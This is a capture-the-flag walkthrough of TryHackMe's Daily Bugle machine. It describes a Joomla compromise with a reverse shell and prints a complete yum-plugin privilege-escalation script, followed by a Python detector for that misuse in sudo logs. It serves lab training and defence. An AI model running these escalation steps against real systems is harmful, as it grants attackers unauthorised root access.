Daily Bugle

https://tryhackme.com/room/dailybugle

User Flag

As usual, let's start with port scanning.

We see there are three open ports (22, 80, 3306). Let's head to port 80.

We see there's a simple website that uses Joomla. Let's check the robots.txt and see if we find something interesting.

Nothing interesting at the moment. We can use dirsearch to see if there's something hidden.

Checking the README.txt file we find the Joomla version.

Let's check if there's any known exploit.

After a while looking for the right exploit we decided to use this one:

After running the exploit we get some credentials.

We can use hashcat to crack the hash we found.

After that we can try to log in to the admin site.

Once inside the Joomla administration page we can successfully upload a reverse shell and gain access to the victim machine. We can do that by following these steps:

Templates > Templates > Protostar Details and Files

Now we can edit the index.php file and add our reverse shell.

After saving the file we just have to refresh the site. Don't forget to start a listener.

We're inside. Let's see if we can get the flag.

No luck. If we take a look around the machine we see there's a configuration.php file in /var/www/html. If you read it you'll find a password.

We can use the found password to log in as jjameson and grab the flag.

Root Flag

Let's run sudo -l to see if we have sudo perms.

We can run yum as a privileged user. Taking a look at gtfobins.github.io, we can gain root privileges by following these steps:

TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y

Let's do that and grab the flag.
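
From the defender's side, the sudo yum invocation above leaves a record in sudo's log, and it can be flagged there. The following is an added example, not part of the original write-up: it scans sudo log lines for yum runs as root that point at a config file outside /etc or enable plugins from the command line. The log line layout, the host name web01, the /tmp path and the choice of /etc as the only trusted config location are assumptions made for the example.

```python
import posixpath
import re

# sudo log record: "<user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmd>"
SUDO_RE = re.compile(r"sudo(?:\[\d+\])?:\s+(\S+) : .*?USER=(\S+) ; COMMAND=(.+)$")
TRUSTED_CONF_DIRS = ("/etc/",)  # assumption: legitimate yum configs live under /etc


def yum_findings(argv):
    """Return the reasons a yum command line can load caller-controlled plugins."""
    reasons = []
    for i, arg in enumerate(argv):
        conf = None
        if arg in ("-c", "--config") and i + 1 < len(argv):
            conf = argv[i + 1]
        elif arg.startswith("--config="):
            conf = arg.split("=", 1)[1]
        # normpath first, so /etc/../tmp/x is not mistaken for a file under /etc
        if conf is not None and not posixpath.normpath(conf).startswith(TRUSTED_CONF_DIRS):
            reasons.append("config outside /etc: " + conf)
        if arg.startswith("--enableplugin"):
            reasons.append("plugin enabled on command line")
        if arg.startswith("--setopt=") and arg.split("=", 2)[1] in ("plugins", "pluginpath", "pluginconfpath"):
            reasons.append("plugin option overridden: " + arg)
    return reasons


def scan(lines):
    """Return (user, command, reasons) for each flagged yum run as root via sudo."""
    hits = []
    for line in lines:
        m = SUDO_RE.search(line)
        if not m:
            continue
        user, runas, cmd = m.groups()
        argv = cmd.split()  # sudo logs the arguments joined by spaces
        if runas == "root" and argv and posixpath.basename(argv[0]) == "yum":
            reasons = yum_findings(argv)
            if reasons:
                hits.append((user, cmd, reasons))
    return hits


# Constructed sample lines in the /var/log/secure style; host and paths are made up.
PREFIX = "Mar  3 09:14:02 web01 sudo: jjameson : TTY=pts/0 ; PWD=/home/jjameson ; USER=root ; COMMAND="
SAMPLE = [PREFIX + c for c in (
    "/usr/bin/yum -c /tmp/tmp.EXAMPLE/x --enableplugin=y",
    "/usr/bin/yum -y update",
    "/usr/bin/yum --config=/etc/../tmp/x list installed")]
```

Calling scan(SAMPLE) flags the first and third lines and leaves the plain update alone. The longer-term fix is on the sudoers side: a rule that lets an unprivileged user run yum with arbitrary arguments is equivalent to granting root.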
